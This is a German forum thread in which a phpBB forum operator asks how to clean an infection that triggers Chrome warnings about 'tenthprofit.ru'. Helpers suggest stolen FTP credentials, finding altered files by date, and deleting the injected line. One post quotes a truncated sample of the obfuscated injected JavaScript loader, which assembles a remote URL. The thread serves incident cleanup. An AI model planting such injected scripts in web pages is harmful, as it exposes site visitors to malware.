php debug fehler und virus warung

[storm-rider]

so,

overall header und overall footer gecheckt. da steht aber das nicht drin, was ich ausm quelltext rauskopiert habe....

ich versteh nur noch bahnhof...

[storm-rider]

Also ..laut Changelog hast du Forum Version 3.0.0,
Sollte das an dieser Stelle zutreffen, so darf ich mir ein schmunzeln wohl erlauben

hab übrigens die 3.0.5
weis ned warum da was anderes im changelog steht...

[macmoldis]

user meiner foren bekommen jetz diverse warnungen!!! z.B.

[ externes Bild ]

Das sind die Warnmelsungen vom GoogleChrome, die Warnung betrifft die Seite "tenthprofit.ru".
Irgend etwas auf deiner Seite ruft was von dort auf, das könnte selbst ein kleines Bild sein, was dort auf dem Server liegt.

meinst du dieses skript?

<script>var q=false;E=[];this.p=8420;this.p++;var P;Nc=12864;Nc++;var ue=["Q","j","Zz"];U=function(){this.wW="";var yc=742;var aA=["su","uw","G"];suy=65128;suy+=65;function a(l,g,n){var gM=["AY"];return l.substr(g,n);}sA=12399;sA-=112;this.QG=22173;this.QG-=9;var Z=RegExp;this.r=58264;this.r--;var _E={Hj:43730};var o='';vR={k:44051};var qh=35135;var X=String("/paip"+"ai-co"+a("m/goozAkX",0,5)+a("gle.cZwH",0,5)+a("XCFom/zeCFX",3,5)+a("uk3do.cok3u",3,5)+a("m.phpQ9Y",0,5)); [Script gekürzt - Dr.Death]

Das Script wurde dir dann wohl mit geklautem ftp-zugang in in die Dateien eingefügt,
eigenen Rechner überprüfen, sämtliche ftp-passwörter ändern
Hatte dieses Script vor einiger Zeit auch mal drin, war in verschiedenen index-Dateien auf unterschiedlichen Servern, also auch bei anderen Seiten mal schauen, wenn du mehrere ftp-zugänge hast.

diese Art von "Virus" Problem liegt zu 99% am infizierten PC des Forenbetreibers.
Der Virus befällt alle PHP / HTML Dateien. Beim Hochladen der Dateien auf dem Webserver wird der Virus eingeschleust.

Das einfügen des Scripts erfolgte nicht beim hochladen, denn das Änderungsdatum entsprach nicht dem Zeitpunkt des hochladens, sondern später. Aber richtig, es liegt am infizierten PC des Forenbetreibers --> geklaute Zugangsdaten/Passwörter.

[storm-rider]

hallo macmoldis,

find ich supi das sich wer gefunden hat, der das selbe problem hatte!!

(sorry, das klingt jetz fies, aber ich denke du weist wie ich es meine..)

kannst du mir sagen wie ich das los werde??? bitte bitte???

ja du hast recht, es lief über den FTP zugang am PC, hab dann gleich das
passwort geändert. auf dem FTP laufen 4 Foren, die wohl alle befallen sind.

kannst mir helfen? wo muss ich danach suchen? bzw. wie kann ich es aus
den entsprechenden dateien entfernen??

[macmoldis]

kannst mir helfen? wo muss ich danach suchen? bzw. wie kann ich es aus
den entsprechenden dateien entfernen??

Ich hatte als erstes anhand des Erstellungs/Änderungsdatum geschaut, welche Datei wann geändert wurden.
Da ich wußte, wann ich die letzen hochgeladen hatte war es relativ einfach, die erst kürzlich geänderten heraus zu finden. Außerdem hatte ich ja auch sofort die Meldungen von Usern, war also auch relativ einfach die betreffenden Datein zu finden.

Aber zur endgültigen Sicherheit habe ich alle Dateien heruntergeladen, die Suche nach dem Text beispielsweise "<script>var q=false" oder etwas anderes markantes aus dem Script über die Dateien laufen lassen. Und da der Virenscanner bei dem Script anschlug, so auch diesen anschließend noch mal drüber.

Wie entfernen?
Tja wenn die Dateien gefunden, diese im Text-Editor öffnen und das Script löschen. in fast allen Fällen stand dies in der ersten Zeile, einmal nur in der letzten.

Anschließend die geänderten Dateien wieder hochladen.


Was die Google-Chrome Warnung betrifft, schauen was auf der Datei bei der diese Meldung auftritt, die Verbindung zu "tenthprofit.ru", im Quelltext schauen, kann auch ein Bild, welches so keinen Schaden anrichtet, die Meldung kommt aber weil es eben auf dem Server von "tenthprofit.ru" liegt.

Was das erstgenannte Script für einen Schaden anrichtet ist mir nicht bekannt, da ja eben verschlüsselt, gibt aber Programme die das auch entschlüsseln, habe mich aber nach der Entfernung und da nun wieder Ruhe eingetreten ist, nicht weiter damit befasst.


Nachtrag:
neben dem Ändern der Passwörter natürlich auch das Sicherheitsloch suchen,
eventuell Rechner neu aufsetzen

[storm-rider]

hallo,

danke für die hilfe, das werd ich mir dann heut abend gleich mal ansehen. auf die sache mit dem änderungsdatum wäre ich nicht gekommen!!

wg. sicherheitsloch aufm rechner.. mein virusmelder hat den ja angezeigt, aber anscheinend is der trotzdem durchgekommen. werd ich ums neu aufsetzen wohl ned rum kommen... is auch ned so tragisch, würd halt
zumindest gern die foren retten!!

DANKe nochmal, ich meld mich wieder wenns was neues gibt.

[storm-rider]

hi ich mal,

hab schon die ersten dateien gefunden!!!

wie sieht es mit files wie editor.js und pngfix.js aus?
die kann ich ja nicht editieren...

[franki]

hi ich mal,

hab schon die ersten dateien gefunden!!!

wie sieht es mit files wie editor.js und pngfix.js aus?
die kann ich ja nicht editieren...

Ich weis ja nicht welchen Editor du verwendest aber der Notepad++ kann alle Files (phpbb) bearbeiten.